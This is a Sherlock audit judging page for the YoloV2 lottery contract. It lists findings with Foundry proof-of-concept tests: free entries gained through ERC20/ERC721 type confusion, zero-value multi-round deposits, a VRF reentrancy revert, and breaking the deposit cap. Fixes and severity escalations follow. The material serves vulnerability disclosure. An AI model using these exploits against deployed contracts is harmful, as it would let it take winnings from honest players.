Juging Contests
Escalations Open
Sherlock Judging
Juging Contests
Escalations Open
Sherlock Judging
Kow, bughuntoor, mert_eren
Lack of explicit separation between ERC20 and ERC721 deposits allows users to gain free entries for any round given there exists a whitelisted ERC20 token with price greater than the round's valuePerEntry
When depositing tokens, users can specify whether the token type is ERC20 or ERC721. While the token address specified is checked against a whitelist, the token type specified is unrestricted.
if (isCurrencyAllowed[tokenAddress] != 1) { revert InvalidCollection(); }
This means a user can specify ERC721 as the token type even if the token being deposited is an ERC20 token.
A deposit of this nature does not need signed Reservoir price data if the price is already specified (ie. the token was deposited before as an ERC20 token).
if (singleDeposit.tokenType == YoloV2__TokenType.ERC721) { if (price == 0) { price = _getReservoirPrice(singleDeposit); prices[tokenAddress][roundId] = price; }
As long as the price of the token is greater than round.valuePerEntry
, the entriesCount
will be non-zero. At the time of writing, using the 0.01 ETH
value used on the currently deployed Yolo contract, this is around USD$25.
uint256 entriesCount = price / round.valuePerEntry; if (entriesCount == 0) { revert InvalidValue(); }
The user can specify an arbitrary length array for singleDeposit.tokenIdsOrAmounts
filled with zeros (given this doesn't exceed the max deposit limit). This is what allows free entries by specifying zero transfers.
When the token is batch transferred by the transfer manager, a low level call to transferFrom
on the specified token address is made.
} else if (tokenType == TokenType.ERC721) { for (uint256 j; j < itemIdsLengthForSingleCollection; ) { ... _executeERC721TransferFrom(items[i].tokenAddress, from, to, itemIds[j]);
function _executeERC721TransferFrom(address collection, address from, address to, uint256 tokenId) internal { ... (bool status, ) =, (from, to, tokenId))); ... }
The function signature of transferFrom
for ERC721 and ERC20 is identical, so this will call transferFrom
on the ERC20 contract with amount = 0
(since 'token ids' specified in singleDeposit.tokenIdsOrAmounts
are all 0
). Consequently, the user pays nothing and the transaction executes successfully (as long as the ERC20 token does not revert on zero transfers).
Paste the test below into Yolo.deposit.t.sol
with forge-std/console.sol
imported. It demonstrates a user making 3 free deposits (in the same transaction) using the MKR token (ie. with zero MKR balance). The token used can be substituted with any token with price > valuePerEntry = 0.01 ETH
(which is non-rebasing/non-taxable and has sufficient liquidity in their /ETH Uniswap v3 pool as specified in the README).
function test_freeDeposit() public { // setup MKR token address MKR = 0x9f8F72aA9304c8B593d555F12eF6589cC3A579A2; vm.prank(owner); priceOracle.addOracle(MKR, 3000); address[] memory currencies = new address[](1); currencies[0] = MKR; vm.prank(operator); yolo.updateCurrenciesStatus(currencies, true); uint256 mkrAmt = 1 ether; // deposit MKR to ensure price is already set for the round // this could be made by the same user making the free deposits with minimal token amount deal(MKR, user4, mkrAmt); IYoloV2.DepositCalldata[] memory dcd = new IYoloV2.DepositCalldata[](1); dcd = new IYoloV2.DepositCalldata[](1); dcd[0].tokenType = IYoloV2.YoloV2__TokenType.ERC20; dcd[0].tokenAddress = MKR; uint256[] memory amounts = new uint256[](1); amounts[0] = mkrAmt; dcd[0].tokenIdsOrAmounts = amounts; _grantApprovalsToTransferManager(user4); vm.startPrank(user4); IERC20(MKR).approve(address(transferManager), mkrAmt); yolo.deposit(1, dcd); vm.stopPrank(); // now deposit MKR as ERC721 // user doesn't need MKR balance to deposit assertEq(IERC20(MKR).balanceOf(user5), 0); dcd[0].tokenType = IYoloV2.YoloV2__TokenType.ERC721; // we can use an arbitrary amount of tokens (so long as we don't exceed max deposits), but we use 3 here amounts = new uint256[](3); dcd[0].tokenIdsOrAmounts = amounts; // we don't need a floor price config if the price has already been set _grantApprovalsToTransferManager(user5); vm.prank(user5); yolo.deposit(1, dcd); IYoloV2.Deposit[] memory deposits = _getDeposits(1); (, , , , , , , uint256 valuePerEntry, , ) = yolo.getRound(1); uint256 mkrPrice = yolo.prices(MKR, 1); // last currentEntryIndex should be 4x since first depositor used 1e18 MKR, // and the free depositor effectively used 3e18 MKR assertEq(deposits[3].currentEntryIndex, (mkrPrice / valuePerEntry) * 4); console.log("Standard deposit"); console.log("Entry index after first deposit: ", deposits[0].currentEntryIndex); console.log("Free deposits"); console.log("Entry index after second deposit: ", deposits[1].currentEntryIndex); console.log("Entry index after third deposit: ", deposits[2].currentEntryIndex); console.log("Entry index after fourth deposit: ", deposits[3].currentEntryIndex); }
Output from running the test below.
Running 1 test for test/foundry/Yolo.deposit.t.sol:Yolo_Deposit_Test [PASS] test_freeDeposit() (gas: 725484) Logs: Standard deposit Entry index after first deposit: 88 Free deposits Entry index after second deposit: 176 Entry index after third deposit: 264 Entry index after fourth deposit: 352
Users can get an arbitrary number of entries into rounds for free (which should generally allow them to significantly increase their chances of winning). In the case the winner is a free depositor, they will end up with the same profit as if they participated normally since they have to pay the fee over the total value of the deposits (which includes the price of their free deposits). If the winner is an honest depositor, they still have to pay the full fee including the free entries, but they are unable to claim the value for the free entries (since the tokenId
(or amount
) is zero). They earn less profit than if everyone had participated honestly.
Manual Review
Whitelist tokens using both the token address and the token type (ERC20/ERC721).
1 comment(s) were left on this issue during the judging contest.
takarez commented:
valid: high(3)
See comments in #128
0rpse, 0xG0P1, 0xMAKEOUTHILL, 0xrcontre360, 0xrice.cooker, Cosine, HSP, KingNFT, Krace, KupiaSec, LTDingZhen, Varun_05, asauditor, ast3ros, bughuntoor, cawfree, cocacola, dany.armstrong90, deepplus, dimulski, fibonacci, jasonxiale, mert_eren, mstpr-brainbot, nobody2018, petro1912, pontifex, s1ce, thank_you, unforgiven, vvv, zraxx, zzykxx
The main invariant to determine the winner is that the indexes must be in ascending order with no repetitions. Therefore, depositing "0" is strictly prohibited as it does not increase the index. However, there is a method by which a user can easily deposit "0" ether to any round without any extra costs than gas.
As stated in the summary, depositing "0" will not increment the entryIndex, leading to a potential issue with the indexes array. This, in turn, may result in an unfair winner selection due to how the upper bound is determined in the array. The relevant code snippet illustrating this behavior is found here.
Let's check the following code snippet in the depositETHIntoMultipleRounds
for (uint256 i; i < numberOfRounds; ++i) { uint256 roundId = _unsafeAdd(startingRoundId, i); Round storage round = rounds[roundId]; uint256 roundValuePerEntry = round.valuePerEntry; if (roundValuePerEntry == 0) { (, , roundValuePerEntry) = _writeDataToRound({roundId: roundId, roundValue: 0}); } _incrementUserDepositCount(roundId, round); // @review depositAmount can be "0" uint256 depositAmount = amounts[i]; // @review 0 % ANY_NUMBER = 0 if (depositAmount % roundValuePerEntry != 0) { revert InvalidValue(); } uint256 entriesCount = _depositETH(round, roundId, roundValuePerEntry, depositAmount); expectedValue += depositAmount; entriesCounts[i] = entriesCount; } // @review will not fail as long as user deposits normally to 1 round // then he can deposit to any round with "0" amounts if (expectedValue != msg.value) { revert InvalidValue(); }
as we can see in the above comments added by me starting with "review" it explains how its possible. As long as user deposits normally to 1 round then he can also deposit "0" amounts to any round because the expectedValue
will be equal to msg.value.
Textual PoC:
Assume Alice sends the tx with 1 ether as msg.value and "amounts" array as [1 ether, 0, 0].
first time the loop starts the 1 ether will be correctly evaluated in to the round. When the loop starts the 2nd and 3rd iterations it won't revert because the following code snippet will be "0" and adding 0 to expectedValue
will not increment to expectedValue
so the msg.value will be exactly same with the expectedValue
if (depositAmount % roundValuePerEntry != 0) { revert InvalidValue(); }
Coded PoC (copy the test to Yolo.deposit.sol
file and run the test):
function test_deposit0ToRounds() external {, 1 ether);, 1 ether); // @dev first round starts normally vm.prank(user2); yolo.deposit{value: 1 ether}(1, _emptyDepositsCalldata()); // @dev user3 will deposit 1 ether to the current round(1) and will deposit // 0,0 to round 2 and round3 uint256[] memory amounts = new uint256[](3); amounts[0] = 1 ether; amounts[1] = 0; amounts[2] = 0; vm.prank(user3); yolo.depositETHIntoMultipleRounds{value: 1 ether}(amounts); // @dev check user3 indeed managed to deposit 0 ether to round2 IYoloV2.Deposit[] memory deposits = _getDeposits(2); assertEq(deposits.length, 1); IYoloV2.Deposit memory deposit = deposits[0]; assertEq(uint8(deposit.tokenType), uint8(IYoloV2.YoloV2__TokenType.ETH)); assertEq(deposit.tokenAddress, address(0)); assertEq(deposit.tokenId, 0); assertEq(deposit.tokenAmount, 0); assertEq(deposit.depositor, user3); assertFalse(deposit.withdrawn); assertEq(deposit.currentEntryIndex, 0); // @dev check user3 indeed managed to deposit 0 ether to round3 deposits = _getDeposits(3); assertEq(deposits.length, 1); deposit = deposits[0]; assertEq(uint8(deposit.tokenType), uint8(IYoloV2.YoloV2__TokenType.ETH)); assertEq(deposit.tokenAddress, address(0)); assertEq(deposit.tokenId, 0); assertEq(deposit.tokenAmount, 0); assertEq(deposit.depositor, user3); assertFalse(deposit.withdrawn); assertEq(deposit.currentEntryIndex, 0); }
High, since it will alter the games winner selection and it is very cheap to perform the attack.
Manual Review
Add the following check inside the depositETHIntoMultipleRounds function
if (depositAmount == 0) { revert InvalidValue(); }
2 comment(s) were left on this issue during the judging contest.
takarez commented:
valid because {valid: but the impact is very low compared to the duplicated issue 002}, ?
takarez commented:
valid: high(1)
Users can deposit ETH to multiple future rounds. If the future round can be "drawn" immediately when the current round ends this execution will revert because of chainlink contracts reentrancy guard protection hence ending the current round will be impossible and it needs to be cancelled by governance.
When the round is Drawn, VRF is expected to call fulfillRandomWords
to determine the winner in the current round and starts the next round.
function is triggered by the rawFulfillRandomWords
external function in the Yolo contract which is also triggered by the randomness providers call to VRF's fulFillRandomWords
function which has a reentrancy check as seen and just before the call to Yolo contract it sets to "true".
If the next round is "drawable" then the _startRound
will draw the next round immediately and by doing so it will try to call VRF's requestRandomWords
function which also has a nonreentrant modifier
since the reentrancy lock was set to "true" in first call, the second calling requesting randomness will revert. Current "drawn" round will not be completed and there will be no winner because of the chainlink call will revert every time the VRF calls the yolo contract.
Already "drawn" round will not be concluded and there will be no winner.
VRF's keepers will see their tx is reverted
Manual Review
Do not draw the contract immediately if it's winnable. Anyone can call drawWinner when the conditions are satisfied. This will slow the game pace, if that's not ideal then add an another if check to the drawWinner to conclude a round if its drawable immediately .
1 comment(s) were left on this issue during the judging contest.
takarez commented:
invalid: should provide POC
request poc
PoC requested from @mstpr
Requests remaining: 6
@nevillehuang There's no need for a PoC for this issue. A medium finding makes sense to me.
I tried to make a PoC but couldn't mock the actual VRF call from chainlink
I believe this can be a high issue because if the fulFillRandomWords reverts chainlink random providers will not try to call the contract address. When I talked with the Chainlink team they said if the issue is fixable then fix it, if not redeploy the contract. Fixing this issue is not possible without re-writing that specific piece of the code so a redeployment is a must with the modified code.
While it's a non-trivial bug, technically no fund is lost, and the stuck round can be cancelled. Based on Sherlock's guidelines should this be a High? I will leave the final judgment to @nevillehuang.
Would like to respectfully escalate this down to invalid.
As @0xhiroshi highlights, there is no loss of funds, instead the only effect of this bug is a DOS of 24 hours, after the 24 hours, the round can be canceled.
According to sherlock documentation, if a DOS does not last more than 1 week, it does not constitute a valid issue.
The issue causes locking of funds for users for more than a week
Additionally, given that the dos is caused because of an external contract this further supports my reasoning as to why this issue is invalid. Given that the readme states that
In case of external protocol integrations, are the risks of external contracts pausing or executing an emergency withdrawal acceptable? If not, Watsons will submit issues related to these situations that can harm your protocol's functionality.
In conclusion based on sherlock docs of what makes a valid issue, and the readme, this issue should be invalid.
Would like to respectfully escalate this down to invalid.
As @0xhiroshi highlights, there is no loss of funds, instead the only effect of this bug is a DOS of 24 hours, after the 24 hours, the round can be canceled.
According to sherlock documentation, if a DOS does not last more than 1 week, it does not constitute a valid issue.
The issue causes locking of funds for users for more than a week
Additionally, given that the dos is caused because of an external contract this further supports my reasoning as to why this issue is invalid. Given that the readme states that
In case of external protocol integrations, are the risks of external contracts pausing or executing an emergency withdrawal acceptable? If not, Watsons will submit issues related to these situations that can harm your protocol's functionality.
In conclusion based on sherlock docs of what makes a valid issue, and the readme, this issue should be invalid.
You've created a valid escalation!
To remove the escalation from consideration: Delete your comment.
You may delete or edit your escalation comment anytime before the 48-hour escalation window closes. After that, the escalation becomes final.
@mstpr @ArnieGod This looks to me to be not just a regular DoS., but could occur every single time the following scenario described happens:
If the future round can be "drawn" immediately when the current round ends this execution will revert because of chainlink contracts reentrancy
So if every single time admin needs to be forced to cancel rounds, this is broken functionality to me and should constitute medium severity, since it breaks the intended game mechanism catering to the above scenario every time.
@mstpr This looks to me to be not just a regular DoS., but could occur every single time the following scenario described happens:
If the future round can be "drawn" immediately when the current round ends this execution will revert because of chainlink contracts reentrancy
So if every single time admin needs to be forced to cancel rounds, this is broken functionality to me and should constitute medium severity, since it breaks the intended game mechanism catering to the above scenario every time.
Yes this can happen every single time and it's broken functionality.
@nevillehuang @0xhiroshi
From what I see if fullFillRandomWords ever fails in chainlink the chainlink keepers will not be calling the contract once again. If that's true, the contract has to be redeployed and basically the game is fully not playable for any round. Would that make it a high issue ?
@mstpr I don't think so, because the round can be cancelled and the deposited funds can be retrieved, than the fix can be implemented. So this is essentially a permanent DoS for that scenario.
Breaking core functionality without loss of funds is a Medium severity issue.
[A medium severity issue] breaks core contract functionality, rendering the contract useless (...)
Planning to reject the escalation and leave the issue as is.
@Czar102 Would appreciate if you could hold off on resolving this one for the next day or so. Would like to think about it for a bit.
Sorry @detectiveking123, but I can't hold off the resolution any longer.
Escalations have been resolved successfully!
Escalation status:
0xMAKEOUTHILL, HSP, KupiaSec, LTDingZhen, bughuntoor, cocacola, deepplus, lil.eth, pontifex, s1ce, unforgiven, zzykxx
The number of deposits in a round can be larger than MAXIMUM_NUMBER_OF_DEPOSITS_PER_ROUND, because there is no such check in depositETHIntoMultipleRounds() function or rolloverETH() function.
depositETHIntoMultipleRounds() function is called to deposit ETH into multiple rounds, so it's possible that the number of deposits in both current round and next round is MAXIMUM_NUMBER_OF_DEPOSITS_PER_ROUND.
When current round's number of deposits reaches MAXIMUM_NUMBER_OF_DEPOSITS_PER_ROUND, the round is drawn:
if ( _shouldDrawWinner( startingRound.numberOfParticipants, startingRound.maximumNumberOfParticipants, startingRound.deposits.length ) ) { _drawWinner(startingRound, startingRoundId); }
_drawWinner() function calls VRF provider to get a random number, when the random number is returned by VRF provider, fulfillRandomWords() function is called to chose the winner and the next round will be started:
_startRound({_roundsCount: roundId});
If the next round's deposit number is also MAXIMUM_NUMBER_OF_DEPOSITS_PER_ROUND, _startRound() function may also draw the next round as well, so it seems that there is no chance the the number of deposits in a round can become larger than MAXIMUM_NUMBER_OF_DEPOSITS_PER_ROUND:
if ( !paused() && _shouldDrawWinner(numberOfParticipants, round.maximumNumberOfParticipants, round.deposits.length) ) { _drawWinner(round, roundId); }
However, _startRound() function will draw the round only if the protocol is not paused. Imagine the following scenario:
round 1
and round 2
is drawn, before random number is sent back by VRF provider, the protocol is paused by the admin for some reason;round 2
;round 2
is set to OPEN but not drawn;round 2
by calling depositETHIntoMultipleRounds() function or rolloverETH() function, this will make the deposit number of round 2
larger than MAXIMUM_NUMBER_OF_DEPOSITS_PER_ROUND.Please run the test code to verify:
function test_audit_deposit_more_than_max() public { address alice = makeAddr("Alice"); address bob = makeAddr("Bob");, 2 ether);, 2 ether); uint256[] memory amounts = new uint256[](2); amounts[0] = 0.01 ether; amounts[1] = 0.01 ether; // Users deposit to make the deposit number equals to MAXIMUM_NUMBER_OF_DEPOSITS_PER_ROUND in both rounds uint256 MAXIMUM_NUMBER_OF_DEPOSITS_PER_ROUND = 100; for (uint i; i < MAXIMUM_NUMBER_OF_DEPOSITS_PER_ROUND / 2; ++i) { vm.prank(alice); yolo.depositETHIntoMultipleRounds{value: 0.02 ether}(amounts); vm.prank(bob); yolo.depositETHIntoMultipleRounds{value: 0.02 ether}(amounts); } // owner pause the protocol before random word returned vm.prank(owner); yolo.togglePaused(); // random word returned and round 2 is started but not drawn vm.prank(VRF_COORDINATOR); uint256[] memory randomWords = new uint256[](1); uint256 randomWord = 123; randomWords[0] = randomWord; yolo.rawFulfillRandomWords(FULFILL_RANDOM_WORDS_REQUEST_ID, randomWords); // owner unpause the protocol vm.prank(owner); yolo.togglePaused(); // User deposits into round 2 amounts = new uint256[](1); amounts[0] = 0.01 ether; vm.prank(bob); yolo.depositETHIntoMultipleRounds{value: 0.01 ether}(amounts); ( , , , , , , , , , YoloV2.Deposit[] memory round2Deposits ) = yolo.getRound(2); // the number of deposits in round 2 is larger than MAXIMUM_NUMBER_OF_DEPOSITS_PER_ROUND assertEq(round2Deposits.length, MAXIMUM_NUMBER_OF_DEPOSITS_PER_ROUND + 1); }
This issue break the invariant that the number of deposits in a round can be larger than MAXIMUM_NUMBER_OF_DEPOSITS_PER_ROUND.
Manual Review
Add check in _depositETH() function which is called by both depositETHIntoMultipleRounds() function and rolloverETH() function to ensure the deposit number cannot be larger than MAXIMUM_NUMBER_OF_DEPOSITS_PER_ROUND:
uint256 roundDepositCount = round.deposits.length; + if (roundDepositCount >= MAXIMUM_NUMBER_OF_DEPOSITS_PER_ROUND) { + revert MaximumNumberOfDepositsReached(); + } _validateOnePlayerCannotFillUpTheWholeRound(_unsafeAdd(roundDepositCount, 1), round.numberOfParticipants);
1 comment(s) were left on this issue during the judging contest.
takarez commented:
invalid: when the contract is paused; major functions are meant to stop working; and the chance of pausing is very low as it happen during an emergency
The above comment is incorrect, since this can potentially impact outcome of game by bypassing an explicit rule/invariant of fixed 100 deposits per round, this should constitute medium severity